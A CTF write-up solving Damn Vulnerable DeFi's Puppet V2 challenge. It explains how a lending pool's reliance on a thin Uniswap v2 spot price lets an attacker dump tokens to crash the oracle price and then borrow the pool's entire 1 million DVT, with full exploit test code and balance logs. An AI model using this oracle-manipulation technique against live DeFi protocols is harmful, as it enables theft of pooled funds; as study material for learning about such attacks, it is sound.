Damn Vulnerable DeFi is a series of DeFi smart contract attack challenges. The content includes flash loan attacks, lending pools, on-chain oracles, etc. Before starting, you need to have skills in Solidity and JavaScript. Your task for each challenge is to ensure that the unit tests for that challenge can pass.
Challenge link: https://www.damnvulnerabledefi.xyz/challenges/9.html
Challenge description:
The developer of the previous lending pool challenge has released a new version that now uses Uniswap v2 as the price oracle and recommended toolkit.
You start with 20 ETH and 10,000 DVT, and there are 1 million DVT tokens in the new lending pool. Your goal is to drain all the DVT tokens from the lending pool.
The solution for this challenge is similar to the previous lending pool challenge, with the difference being that ETH has been replaced with WETH. WETH is an ERC20 token that is equivalent to ETH with a 1:1 value ratio.
Additionally, the challenge uses Uniswap v2 as the price oracle. The v2 version supports token-to-token pairing contracts, and in this challenge, the pairing contract is WETH-DVT.
The lending contract PuppetV2Pool.sol provides the borrowing functionality as follows:
function borrow(uint256 borrowAmount) external {
// Ensure that the contract holds enough DVT tokens for borrowing
require(_token.balanceOf(address(this)) >= borrowAmount, "Not enough token balance");
// Calculate the required amount of WETH to deposit
uint256 depositOfWETHRequired = calculateDepositOfWETHRequired(borrowAmount);
// Transfer WETH to this contract
_weth.transferFrom(msg.sender, address(this), depositOfWETHRequired);
// Record the deposited WETH
deposits[msg.sender] += depositOfWETHRequired;
// Transfer DVT tokens to msg.sender
require(_token.transfer(msg.sender, borrowAmount));
emit Borrowed(msg.sender, depositOfWETHRequired, borrowAmount, block.timestamp);
}
To borrow DVT tokens, the borrower needs to deposit WETH. The amount of WETH to be deposited is calculated using the following method:
function calculateDepositOfWETHRequired(uint256 tokenAmount) public view returns (uint256) {
// The collateral value should be 3 times the borrowed DVT tokens
return _getOracleQuote(tokenAmount).mul(3) / (10 ** 18);
}
function _getOracleQuote(uint256 amount) private view returns (uint256) {
// Get the reserves of WETH and DVT tokens
// getReserves internally calculates the address of the pairing contract and returns the reserves of the paired tokens
(uint256 reservesWETH, uint256 reservesToken) = UniswapV2Library.getReserves(
_uniswapFactory, address(_weth), address(_token)
);
// Calculate the value of DVT tokens
// amount / x = reservesToken / reservesWETH
// x = (amount * reservesWETH) / reservesToken
return UniswapV2Library.quote(amount.mul(10 ** 18), reservesToken, reservesWETH);
}
Uniswap has a pairing contract for WETH-DVT, with reserves of reservesWETH and reservesToken.
The calculation for the value of DVT tokens satisfies the formula:
In the test script puppet-v2.challenge.js, the following initialization is done:
- The
Uniswapfactory contract deploys the WETH-DVT pairing contract and adds liquidity of 10 WETH-100 DVT. - The attacker is transferred 10,000 DVT and 20 ETH.
- The lending contract is transferred 1 million DVT.
If the attacker borrows all the DVT tokens directly, the cost would be:
Since the attacker only holds 20 ETH and WETH is equivalent to ETH with a 1:1 ratio, it is not possible to complete the challenge.
Therefore, the attacker can use the DVT tokens they hold to exchange for WETH in Uniswap. This action will increase the reserves of DVT tokens in the WETH-DVT pairing contract and decrease the reserves of WETH, resulting in an overall decrease in the value of DVT tokens.
it('Exploit', async function () {
const attackerCallLendingPool = this.lendingPool.connect(attacker)
const attackerCallUniswap = this.uniswapRouter.connect(attacker)
const attackerCallToken = this.token.connect(attacker)
const attackerCallWETH = this.weth.connect(attacker)
// init:
// Attacker ETH: 20.0
// Attacker WETH: 0.0
// Attacker DVT: 10000.0
// Uniswap WETH: 10.0
// Uniswap DVT: 100.0
// LendingPool DVT: 1000000.0
// Approve Uniswap to spend attacker's DVT tokens
await attackerCallToken.approve(attackerCallUniswap.address, ATTACKER_INITIAL_TOKEN_BALANCE)
// Swap DVT for WETH in Uniswap
await attackerCallUniswap.swapExactTokensForTokens(
ATTACKER_INITIAL_TOKEN_BALANCE,
ethers.utils.parseEther('9'),
[attackerCallToken.address, attackerCallWETH.address],
attacker.address,
(await ethers.provider.getBlock('latest')).timestamp * 2
)
// Attacker ETH: 19.99975413442550073
// Attacker WETH: 9.900695134061569016
// Attacker DVT: 0.0
// Uniswap WETH: 0.099304865938430984
// Uniswap DVT: 10100.0
// LendingPool DVT: 1000000.0
// Calculate the amount of WETH to be collateralized
const collateralCount = await attackerCallLendingPool.calculateDepositOfWETHRequired(POOL_INITIAL_TOKEN_BALANCE)
console.log('collateralCount: ', ethers.utils.formatEther(collateralCount))
// collateralCount: 29.49649483319732198
await attackerCallWETH.approve(attackerCallLendingPool.address, collateralCount)
const tx = {
to: attackerCallWETH.address,
value: ethers.utils.parseEther('19.9')
}
await attacker.sendTransaction(tx)
// Borrow DVT
await attackerCallLendingPool.borrow(POOL_INITIAL_TOKEN_BALANCE, {
gasLimit: 1e6
})
// Attacker ETH: 0.099518462674923535
// Attacker WETH: 0.304200300864247036
// Attacker DVT: 1000000.0
// Uniswap WETH: 0.099304865938430984
// Uniswap DVT: 10100.0
// LendingPool DVT: 0.0
// The WETH that the hacker deposited: 29.49649483319732198
})
Finally, execute yarn puppet-v2 and the test passes!